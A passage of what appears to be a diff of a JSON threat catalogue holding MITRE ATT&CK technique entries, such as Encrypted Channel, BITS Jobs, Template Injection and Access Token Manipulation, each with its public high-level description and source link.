subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates)\nhttps://attack.mitre.org/techniques/T1553\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1573 - Encrypted Channel", - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.\nhttps://attack.mitre.org/techniques/T1573\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1056 - Input Capture", - "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).\nhttps://attack.mitre.org/techniques/T1056\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1203 - Exploitation for Client Execution", - "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\nhttps://attack.mitre.org/techniques/T1203\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1570 - Lateral Tool Transfer", - "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095).\nhttps://attack.mitre.org/techniques/T1570\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1095 - Non-Application Layer Protocol", - "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.\nhttps://attack.mitre.org/techniques/T1095\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1012 - Query Registry", - "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nhttps://attack.mitre.org/techniques/T1012\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1030 - Data Transfer Size Limits", - "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.\nhttps://attack.mitre.org/techniques/T1030\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1499 - Endpoint Denial of Service", - "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\nhttps://attack.mitre.org/techniques/T1499\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1614 - System Location Discovery", - "description": "Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)\nhttps://attack.mitre.org/techniques/T1614\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1197 - BITS Jobs", - "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)\nhttps://attack.mitre.org/techniques/T1197\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1132 - Data Encoding", - "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.\nhttps://attack.mitre.org/techniques/T1132\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1598 - Phishing for Information", - "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\nhttps://attack.mitre.org/techniques/T1598\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1496 - Resource Hijacking", - "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it\u2019s not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR)\nhttps://attack.mitre.org/techniques/T1496\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1585 - Establish Accounts", - "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)\nhttps://attack.mitre.org/techniques/T1585\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1588 - Obtain Capabilities", - "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)\nhttps://attack.mitre.org/techniques/T1588\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1569 - System Services", - "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.\nhttps://attack.mitre.org/techniques/T1569\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1650 - Acquire Access", - "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a \u201cload\u201d that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1650\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1213 - Data from Information Repositories", - "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.\nhttps://attack.mitre.org/techniques/T1213\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1200 - Hardware Additions", - "description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)\nhttps://attack.mitre.org/techniques/T1200\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1505 - Server Software Component", - "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)\nhttps://attack.mitre.org/techniques/T1505\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1485 - Data Destruction", - "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)\nhttps://attack.mitre.org/techniques/T1485\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1537 - Transfer Data to Cloud Account", - "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)\nhttps://attack.mitre.org/techniques/T1537\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1189 - Drive-by Compromise", - "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)\nhttps://attack.mitre.org/techniques/T1189\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1498 - Network Denial of Service", - "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).\nhttps://attack.mitre.org/techniques/T1498\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1651 - Cloud Administration Command", - "description": "Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment\u2019s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)\nhttps://attack.mitre.org/techniques/T1651\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1221 - Template Injection", - "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)\nhttps://attack.mitre.org/techniques/T1221\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1134 - Access Token Manipulation", - "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote 